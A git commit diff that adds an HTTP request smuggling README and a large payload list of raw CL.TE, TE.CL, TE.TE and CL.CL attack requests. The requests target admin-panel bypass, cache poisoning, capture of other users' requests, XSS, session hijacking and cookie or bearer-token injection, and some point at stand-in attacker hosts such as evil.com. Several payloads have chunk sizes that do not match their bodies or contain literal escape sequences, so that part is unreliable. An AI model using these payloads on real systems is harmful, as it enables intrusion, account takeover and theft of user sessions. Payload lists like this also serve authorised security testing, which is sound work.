Add comprehensive payloads and 4 new vulnerability types (SSTI, HTTP Request Smuggling, CORS, JWT)

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>

HTTP-Request-Smuggling/README.md

@@ -0,0 +1,41 @@
+# HTTP Request Smuggling
+
+## Description
+HTTP Request Smuggling occurs when the front-end and back-end servers disagree about where one request ends and the next begins. This vulnerability allows attackers to bypass security controls, gain unauthorized access, and poison web caches.
+
+## Vulnerability Types
+- **CL.TE** - Content-Length vs Transfer-Encoding
+- **TE.CL** - Transfer-Encoding vs Content-Length
+- **TE.TE** - Transfer-Encoding obfuscation
+- **CL.CL** - Duplicate Content-Length headers
+
+## Common Attack Vectors
+- Front-end/Back-end server desynchronization
+- Load balancer misconfigurations
+- Reverse proxy issues
+- CDN edge servers
+- WAF bypass
+
+## Impact
+- Bypass security controls
+- Web cache poisoning
+- Cross-site scripting
+- Request hijacking
+- Credential theft
+- Access other users' requests
+
+## Testing Approach
+1. Send requests with conflicting Content-Length and Transfer-Encoding headers
+2. Observe timing differences and response variations
+3. Test with different header obfuscation techniques
+4. Verify if smuggled requests affect subsequent requests
+
+## Common Vulnerable Configurations
+- HAProxy + Apache
+- Nginx + Apache
+- AWS ALB + various backends
+- Akamai + various backends
+- Cloudflare + various backends
+
+## Payloads
+See `http-request-smuggling-payloads.txt` for a comprehensive list of HTTP Request Smuggling payloads.

HTTP-Request-Smuggling/http-request-smuggling-payloads.txt

@@ -0,0 +1,526 @@
+# HTTP Request Smuggling Payloads
+
+# CL.TE (Content-Length vs Transfer-Encoding)
+# Front-end uses Content-Length, back-end uses Transfer-Encoding
+
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 13
+Transfer-Encoding: chunked
+
+0
+
+SMUGGLED
+
+---
+
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 6
+Transfer-Encoding: chunked
+
+0
+
+G
+
+---
+
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 4
+Transfer-Encoding: chunked
+
+5c
+GPOST / HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 15
+
+x=1
+0
+
+
+---
+
+# TE.CL (Transfer-Encoding vs Content-Length)
+# Front-end uses Transfer-Encoding, back-end uses Content-Length
+
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 3
+Transfer-Encoding: chunked
+
+8
+SMUGGLED
+0
+
+
+---
+
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 4
+Transfer-Encoding: chunked
+
+5e
+POST /admin HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 10
+
+x=
+0
+
+
+---
+
+# TE.TE (Transfer-Encoding obfuscation)
+# Both servers handle Transfer-Encoding but one can be obfuscated
+
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 4
+Transfer-Encoding: chunked
+Transfer-Encoding: cow
+
+5c
+GPOST / HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 15
+
+x=1
+0
+
+
+---
+
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 4
+Transfer-Encoding: chunked
+Transfer-Encoding: x
+
+5c
+GPOST / HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 15
+
+x=1
+0
+
+
+---
+
+# Transfer-Encoding obfuscation variants
+Transfer-Encoding: chunked
+Transfer-Encoding: xchunked
+Transfer-Encoding: chunked
+Transfer-Encoding: x
+Transfer-Encoding: chunked
+Transfer-encoding: chunked
+Transfer-Encoding: chunked 
+Transfer-Encoding: chunked;
+Transfer-Encoding: chunked,
+Transfer-Encoding: identity
+Transfer-Encoding: identity, chunked
+Transfer-Encoding: chunked, identity
+Transfer-Encoding: chunked
+Transfer-Encoding: identity
+ Transfer-Encoding: chunked
+Transfer-Encoding : chunked
+Transfer-Encoding:chunked
+Transfer-Encoding:
+ chunked
+Transfer-Encoding:
+	chunked
+[space]Transfer-Encoding: chunked
+Transfer-Encoding[space]: chunked
+Transfer-Encoding:[space]chunked
+Transfer-Encoding: chu nked
+Transfer-Encoding: chunk ed
+Transfer-Encoding: chun\x0bked
+
+# CL.CL (Duplicate Content-Length)
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 8
+Content-Length: 7
+
+12345
+SMUGGLED
+
+---
+
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 8
+Content-Length: 9
+
+test=1
+SMUGGLED
+
+---
+
+# Cache poisoning via request smuggling
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 130
+Transfer-Encoding: chunked
+
+0
+
+GET /static/script.js HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 10
+
+x=
+
+---
+
+# Bypassing front-end security controls
+POST /login HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 100
+Transfer-Encoding: chunked
+
+0
+
+GET /admin HTTP/1.1
+Host: vulnerable-website.com
+X-Forwarded-For: 127.0.0.1
+Content-Length: 10
+
+x=
+
+---
+
+# Capturing other users' requests
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 230
+Transfer-Encoding: chunked
+
+0
+
+POST /log HTTP/1.1
+Host: vulnerable-website.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1000
+
+comment=
+
+---
+
+# XSS via request smuggling
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 150
+Transfer-Encoding: chunked
+
+0
+
+GET /search?q=<script>alert(1)</script> HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 10
+
+x=
+
+---
+
+# Web cache deception
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 180
+Transfer-Encoding: chunked
+
+0
+
+GET /static/include.js HTTP/1.1
+Host: vulnerable-website.com
+X-Ignore: X
+
+GET /account HTTP/1.1
+Host: vulnerable-website.com
+
+---
+
+# Exploiting different chunk handling
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 4
+Transfer-Encoding: chunked
+
+96
+POST /admin HTTP/1.1
+Host: vulnerable-website.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 30
+
+csrf=token&action=delete
+0
+
+
+---
+
+# Timing-based detection payload
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 4
+Transfer-Encoding: chunked
+
+1
+Z
+Q
+
+---
+
+# Header injection for smuggling
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 200
+Transfer-Encoding: chunked
+
+0
+
+GET / HTTP/1.1
+Host: vulnerable-website.com
+X-Forwarded-Host: evil.com
+Content-Length: 10
+
+x=
+
+---
+
+# Session hijacking
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 250
+Transfer-Encoding: chunked
+
+0
+
+POST /account/update HTTP/1.1
+Host: vulnerable-website.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 150
+
+email=attacker@evil.com&session=
+
+---
+
+# Smuggling with newlines
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Transfer-Encoding:
+ chunked
+Content-Length: 4
+
+5c
+SMUGGLED
+0
+
+
+---
+
+# Smuggling with tabs
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Transfer-Encoding:	chunked
+Content-Length: 4
+
+5c
+SMUGGLED
+0
+
+
+---
+
+# HTTP/2 downgrade smuggling
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Transfer-Encoding: chunked
+Content-Length: 4
+
+0
+
+SMUGGLED
+
+---
+
+# Chunk size obfuscation
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Transfer-Encoding: chunked
+
+0000000000000000000a
+SMUGGLED123
+0
+
+
+---
+
+# Negative Content-Length
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: -1
+Transfer-Encoding: chunked
+
+0
+
+SMUGGLED
+
+---
+
+# Very large Content-Length
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 999999999
+Transfer-Encoding: chunked
+
+0
+
+SMUGGLED
+
+---
+
+# Mixed line endings
+POST / HTTP/1.1\r\n
+Host: vulnerable-website.com\r\n
+Content-Length: 4\r\n
+Transfer-Encoding: chunked\n
+\r\n
+5c\r\n
+SMUGGLED\r\n
+0\r\n
+\r\n
+
+---
+
+# Unicode in headers
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Transfer-Encoding: chunked
+Transfer‐Encoding: identity
+
+0
+
+SMUGGLED
+
+---
+
+# Multiple Host headers
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Host: evil.com
+Content-Length: 4
+Transfer-Encoding: chunked
+
+0
+
+SMUGGLED
+
+---
+
+# Smuggling to internal endpoints
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 150
+Transfer-Encoding: chunked
+
+0
+
+GET /internal/admin HTTP/1.1
+Host: localhost
+X-Forwarded-For: 127.0.0.1
+Content-Length: 10
+
+x=
+
+---
+
+# Cookie injection via smuggling
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 180
+Transfer-Encoding: chunked
+
+0
+
+GET / HTTP/1.1
+Host: vulnerable-website.com
+Cookie: session=stolen_session_here
+Content-Length: 10
+
+x=
+
+---
+
+# Authorization bypass
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 200
+Transfer-Encoding: chunked
+
+0
+
+GET /admin HTTP/1.1
+Host: vulnerable-website.com
+Authorization: Bearer admin_token_here
+Content-Length: 10
+
+x=
+
+---
+
+# CRLF injection in chunks
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Transfer-Encoding: chunked
+
+0\r\n
+\r\n
+GET /admin HTTP/1.1\r\n
+Host: vulnerable-website.com\r\n
+\r\n
+
+---
+
+# Smuggling via Content-Type
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 4
+Transfer-Encoding: chunked
+
+0
+
+SMUGGLED
+
+---
+
+# Request line injection
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 150
+Transfer-Encoding: chunked
+
+0
+
+GPOST /admin HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 10
+
+x=
+
+---
+
+# Protocol smuggling (HTTP/1.1 -> HTTP/2)
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Upgrade: h2c
+Connection: Upgrade, HTTP2-Settings
+HTTP2-Settings: AAMAAABkAAQAAP__
+Content-Length: 4
+Transfer-Encoding: chunked
+
+0
+
+SMUGGLED